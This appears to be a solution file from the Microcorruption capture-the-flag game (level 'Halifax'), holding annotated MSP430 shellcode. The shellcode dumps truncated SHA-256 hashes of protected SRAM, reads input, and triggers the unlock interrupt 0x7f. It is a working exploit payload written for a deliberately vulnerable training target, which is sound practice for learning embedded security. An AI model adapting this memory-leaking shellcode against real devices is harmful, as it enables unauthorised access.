MicroCorruption/25-Halifax/shellcode.asm

; just
6000 1c 0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b906000 f72b 3041

; where depth = number of nibbles in each truncated hash
;       msize = number of bytes per hash

;* depth 8, message size 2
;? completes in 67234 cycles
6000 6c
0b432e433d4000800f4bb012b6452d521b533b904000f82b
0b435e4b00804f4e0f110f110f110f1112c33ef00f003ff00f005f4f1047b01278455f4e1047b01278451b533b900001e82b
3e4040003f400090b0126845
0f433d400090b012b645
3f407f00b0125045 3041

;* depth 6, message size 1
;? completes in 61899 cycles
6000 6d
0b431e433d4000800f4bb012b6453d5003001b533b906000f72b
0b435e4b00804f4e0f110f110f110f1112c33ef00f003ff00f005f4f1047b01278455f4e1047b01278451b533b90c000e82b
3e4040003f400090b0126845
0f433d400090b012b645
3f407f00b0125045 3041



get_sram_hashes:
0b43 1e43 3d400080 0f4b b012b645 3d500300 1b53 3b908000 f72b
0b43            clr r11             ; loop variable in r11
1e43            mov 0(r3), r14      ; r14 = 1
3d40 0080       mov #0x8000, r13    ; set destination to 0x8000

loop:
0f4b            mov  r11, r15       ; mov addr r15
b012 b645       call #0x45b6        ; <sha256_internal>
3d50 0300       add  #3, r13        ; keep 3 bytes of the output
1b53            add  0(r3), r11     ; inc r11
3b90 6000       cmp  #0x80, r11     ; do that 0x1000 times
f72b            jnc  $-0x10

print_hex:
0b43 5e4b0080 4f4e 0f11 0f11 0f11 0f11 12c3 3ef00f00 3ff0 0f00 5f4f1047 b0127845 5f4e1047 b0127845 1b53 3b90 c000 e82b

0b43            clr r11;
5e4b 0080       mov.b 0x8000(r11), r14
4f4e            mov.b r14, r15
0f11            rra.b r15
0f11            rra.b r15
0f11            rra.b r15
0f11            rra.b r15
12c3            clrc
3ef0 0f00       and   #0xf, r14
3ff0 0f00       and   #0xf, r15
5f4f 1047       mov.b 0x4710(r15), r15
b012 7845       call  #0x4578       ; <putchar>
5f4e 1047       mov.b 0x4710(r14), r15
b012 7845       call  #0x4578       ; <putchar>
1b53            add   0(r3), r11    ; inc r11
3b90 c000       cmp   #0x120, r11    ; do that 0x60*3 times
e82b            jnc   $-0x28

take_input:
3e4040003f400090b0126845

3e40 4000       mov   #0x40, r14
3f40 0090       mov   #0x9000, r15
b012 6845       call  #0x4568; <getsn>

check_password_questionmark:
0f433d400090b012b645

0f43            clr   r15
;3e40 0010       mov   #0x1000, r14  ; set length to 0x1000
3d40 0090       mov   #0x9000, r13  ; set buffer to 0x9000
b012 b645       call  #0x45b6       ; <sha256_internal>

unlock7f:
324000ffb0121000 0243 3041

324000ff        mov   #ff00, sr
b0121000        call  #0x10
0243            mov   #0, sr

30127f00b0125045
3012 7f00       push  0x7f
b012 5045       call  0x4550

3041            ret